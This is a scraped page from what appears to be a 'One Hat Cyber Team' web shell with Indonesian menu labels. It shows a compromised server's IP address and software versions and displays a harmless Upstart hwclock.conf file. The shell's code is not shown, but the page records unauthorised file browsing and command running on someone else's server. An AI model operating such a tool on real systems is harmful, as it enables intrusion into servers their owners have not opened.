⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
snap
/
core
/
17212
/
etc
/
init
/
View File Name :
hwclock.conf
# hwclock - adjust system clock and timezone # # The hwclock task adjusts the system clock when the hardware clock is # set to localtime (e.g. when dual-booting with Windows), and also # ensures that the system timezone is set so that timestamps are written # to FAT devices. description "adjust system clock and timezone" start on starting mountall task script # BADYEAR can be in either file . /etc/default/rcS [ ! -r /etc/default/hwclock ] || . /etc/default/hwclock grep -qw LOCAL /etc/adjtime 2>/dev/null && tz="--localtime" || tz="--utc" [ "$BADYEAR" = "yes" ] && badyear="--badyear" exec hwclock --systz $tz --noadjfile $badyear end script